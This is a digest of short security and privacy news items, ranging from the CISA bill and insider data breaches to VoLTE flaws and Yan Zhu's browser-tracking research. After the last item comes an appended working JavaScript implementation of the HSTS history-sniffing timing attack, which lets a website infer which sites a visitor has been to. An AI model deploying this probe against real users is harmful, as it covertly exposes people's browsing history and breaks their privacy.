Senate passes CISA, without privacy protection amendments


The Senate on Tuesday passed CISA, a bill that encourages companies to share private user data with the government, over the objections of civil liberties advocates. Four amendments were proposed to address privacy concerns, but all of them died on the floor. The Cybersecurity Information Sharing Act was introduced by Sen. Dianne Feinstein, D-Calif., in June 2014 following several high-profile cyber attacks on major corporations. It is aimed at keeping user data from falling into the wrong hands. Under the bill, companies would gain increased liability protection when collecting and sharing users’ personal information that could potentially be related to security threats. The proposed legislation also makes it easier for companies to share that data with government agencies and with one another, which is what concerns privacy advocates. Source: The

CIA director says no one’s information is safe

CIA Director John Brennan says the hack of his personal email account shows that everyone is vulnerable to the compromise of personal information on the Internet. Brennan said he was outraged by the publication of sensitive data, including his contact list and his wife’s Social Security number. The hacker has said he is a high school student protesting U.S. policy. Brennan said he was annoyed that some media accounts suggested impropriety on his part, but he did not cite any particular outlets. The CIA director said he did nothing wrong. Source: CBS News

She fought the law, and the law won

A woman accused of posing as a lawyer and defrauding people of tens of thousands of dollars was ordered to stand trial on 18 counts of grand theft and identity theft. Prosecutor Hector Jimenez described Giuliana Bosco Huerta during her preliminary hearing as someone “very talented at duping people.” Among other things, she’s accused of stealing more than $40,000 from a man after telling him she would set up a trust for his child and a license for his bakery business. According to Jimenez, she built “an aura of credibility” by using made-up bar association member numbers and impersonating other people when sending emails to alleged victims. Some emails were sent while she was out on bail following her arrest in June, he alleged. At a prior hearing, Jimenez alleged the defendant in 2005 scammed people out of $50,000 in a medical diet scheme. Source: The Times of San Diego

If the update is offered, take it

Cyber experts say you should not ignore messages or alerts on your iPhone or Android saying you need to update the system. The devices are full of personal data, and if your phone hasn’t downloaded the newest software update, Green Bay Net co-founder Elliot Christenson says hackers can easily steal your information. “They can remotely exploit your phone. … They can control your phone to send out spam or attack other phones or potentially get your data,” Christenson says. Through Bluetooth, which many people leave on, Christenson says hackers can take what they want without you knowing it. He says that on iPhones, the iOS 9 update fixes a problem with AirDrop, the file-sharing feature between Apple devices. He says there’s risk for Androids, too. “They have similar exploits. And because of the nature of Android, they actually fix them faster, but get them out to customers a little bit slower,” he says. Source: WBAY, Green Bay, Wis.

Giving voice to the bad guys

Researchers have shown they can hack voice over LTE (VoLTE) implementations on two tier-one mobile carrier networks, gaining free data usage or shutting down voice or data access for another user. Academics at the University of California Los Angeles, Ohio State University and Shanghai Jiao Tong University in China outline a number of vulnerabilities at the device, chipset and network level that made VoLTE hackable, concluding that the “device OS and chipset fail to prohibit non-VoLTE apps from accessing and injecting packets into VoLTE control and data planes. The network infrastructure also lacks proper access control and runtime check.” Security for VoLTE, and LTE in general, has been on the telecom industry’s radar for some time. “The mobile broadband industry’s rapid migration to LTE has opened the door to malicious and nonmalicious threats due to fundamental vulnerabilities in the all-IP LTE architecture,” said Stéphane Téral, principal analyst for mobile infrastructure and carrier economics at Infonetics Research. Source: RCR Wireless

Bad guys chip in with yet another scam

Banks and other credit card issuers are adding computer chips to cards to make transactions more secure. But a scam is taking advantage of the transition, the Better Business Bureau warns. People are getting official-looking emails saying a new credit or debit card with a chip is on its way. The BBB says these emails look official, using the logos and even the reply address of banks and credit card companies. From there, you’re asked to follow a link in the email to confirm your banking or personal information — information the bank already has and wouldn’t ask for. Or you’re instructed to follow a link to continue the process, giving criminals a chance to download software to your computer, which can be used to steal your information, lock up your data for ransom, or turn your computer into a server for spreading more spam and malware. Source: ABC8, Richmond

Shoplifting a cart full of data

British supermarket group Morrisons could be sued by 2,000 employees following last year’s data security breach. A disgruntled former employee leaked the employees’ personal details. Andrew Skelton was sentenced to eight years after he was found guilty of stealing and illegally sharing the bank, salary and national insurance details of nearly 10,000 of his former colleagues with news outlets and data-sharing websites. More than 2,000 Morrisons staff are pursuing a group litigation order against the supermarket group following a hearing in London’s High Court. The case has been given a four-month waiting period for other Morrisons staff to join the group claim, represented by JMW Solicitors. Source: The Telegraph

An unhealthy outlook

Bon Secours St. Francis Health System in Greenville, S.C., is investigating a data breach by a former employee who, it says, accessed nearly 2,000 medical records of patients and about 30 employees. The health system was notified this past August that several employees were receiving notices of unpaid balances for an antibiotic cream, and others were reporting that their health insurance companies had been charged for the antibiotic creams. St. Francis Health performed an audit and found that an employee had accessed the patient information of approximately 1,997 individuals, compromising patient names, dates of birth, driver’s license numbers, insurance information, clinical information and, potentially, Social Security numbers. Authorities have been notified, and the employee has been terminated. Source: Health IT Security

Expanding the security shield across borders

The Federal Trade Commission and enforcement agencies from seven other countries have launched an information-sharing system that will enable them to better coordinate international efforts to protect consumer privacy. FTC Chairwoman Edith Ramirez joined representatives from several agencies and members of the Global Privacy Enforcement Network in signing a Memorandum of Understanding among users of the new system, called GPEN Alert. “Today, data is increasingly crossing borders, and our privacy investigations and enforcement must do the same,” Ramirez said. “GPEN Alert is an important, practical cooperation tool that will help GPEN authorities protect consumer privacy across the globe.” GPEN Alert is a multilateral system that will enhance coordination by enabling participants to confidentially share information about investigations. Source: Imperial Valley News (Calif.)

Just browsing? That might be a bad idea

A researcher, Yan Zhu, has demonstrated two unpatched weaknesses that webmasters can exploit to track millions of people who visit their sites. The attacks allow websites to compile a list of previously visited domains, even when users have flushed their browsing history, and to tag visitors with a tracking cookie that persists even after users have deleted all normal cookies. The history-sniffing attack works against people who visit sites that use HTTP Strict Transport Security (HSTS), which lets a website instruct browsers to connect only over an encrypted HTTPS connection and to reject any attempt to use an unsecured HTTP link. The measure, used by banks, cloud services and other sensitive sites, is designed to prevent downgrade attacks, in which an attacker able to tamper with traffic between an end user and a server forces an HTTPS connection back to HTTP so the data isn’t protected. The attack embeds non-existent images, referenced over plain HTTP, from HSTS-protected sites. The unscrupulous website then uses JavaScript to measure how long it takes for the load error to register. If the user has visited the HSTS site before, the browser already holds the HSTS entry for it and the error occurs within a few milliseconds. If the error takes longer to register, the attacker can conclude that the site has never been visited. Zhu also described a way a website can track Google Chrome users even when they delete cookies. Instead of abusing HSTS, the supercookie technique exploits weaknesses in a security measure known as HTTP Public Key Pinning (HPKP), designed to protect against certificate forgeries by allowing a website to specify which HTTPS credentials a browser should accept when negotiating encrypted connections to it. The specification allows a website to pin multiple certificates in a browser. Unscrupulous sites can abuse the standard by pinning values that are unique to each visitor. Source: Ars Technica
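The HSTS timing probe described above, written out as an added example (this is not Zhu’s own tool or code from the Ars Technica article). It assumes the attacker’s page is served with a Content-Security-Policy of img-src http: so that a request the browser silently upgrades to https:// (because it already holds an HSTS entry for the host) is blocked locally and errors almost instantly, while a genuine http:// fetch of a non-existent image has to reach the network before it fails; the hostnames, the 10 ms threshold and the sample timings are placeholders constructed for this example.

```javascript
// Added example: HSTS history sniffing by timing image load errors.
// Assumptions (not from the article): the probing page carries the header
//   Content-Security-Policy: img-src http:
// so an HSTS-upgraded (https) image request is blocked before leaving the
// machine and fires onerror in ~1 ms, whereas a real http fetch of a
// non-existent image must fail on the network (tens to hundreds of ms).
// Hostnames below are placeholders for HSTS-enabled sites of interest.

const CANDIDATE_HOSTS = ['bank.example', 'cloud.example', 'mail.example'];

// Classify measured timings. `timingsByHost` maps host -> milliseconds from
// setting img.src to onerror. At or below `thresholdMs` the request never hit
// the network, i.e. the browser already knew the host as HSTS -> "visited".
// The threshold is a constructed default; in practice calibrate it against a
// control host that is known not to use HSTS.
function classifyTimings(timingsByHost, thresholdMs = 10) {
  const verdicts = {};
  for (const [host, ms] of Object.entries(timingsByHost)) {
    verdicts[host] = ms <= thresholdMs ? 'visited' : 'unvisited';
  }
  return verdicts;
}

// Browser-side measurement: returns a Promise resolving to {host: ms}.
// A random path guarantees no cached image can satisfy the request, so the
// only thing being measured is how (and where) the request fails.
function probeHosts(hosts = CANDIDATE_HOSTS) {
  if (typeof Image === 'undefined' || typeof performance === 'undefined') {
    return Promise.reject(new Error('probeHosts needs a browser DOM'));
  }
  return Promise.all(hosts.map(host => new Promise(resolve => {
    const img = new Image();
    const start = performance.now();
    img.onerror = () => resolve([host, performance.now() - start]);
    img.onload = () => resolve([host, Infinity]); // unexpected: image exists
    const nonce = Math.random().toString(36).slice(2);
    img.src = `http://${host}/sniff-${nonce}.png`;
  }))).then(pairs => Object.fromEntries(pairs));
}

// Constructed sample timings standing in for a browser run of probeHosts():
// two hosts failed locally (HSTS entry present), one went out to the network.
const SAMPLE_TIMINGS = {
  'bank.example': 1.4,
  'cloud.example': 83.0,
  'mail.example': 2.2,
};

// Offline demonstration of the classification step.
const SAMPLE_VERDICTS = classifyTimings(SAMPLE_TIMINGS);
console.log(SAMPLE_VERDICTS); // bank.example and mail.example -> visited
```

In a browser the whole attack is `probeHosts().then(classifyTimings)`; the defence that matters to site owners is outside the page’s scope, but note that the probe only works because the HSTS cache is consulted before any network activity, which is exactly what makes HSTS effective against downgrade attacks.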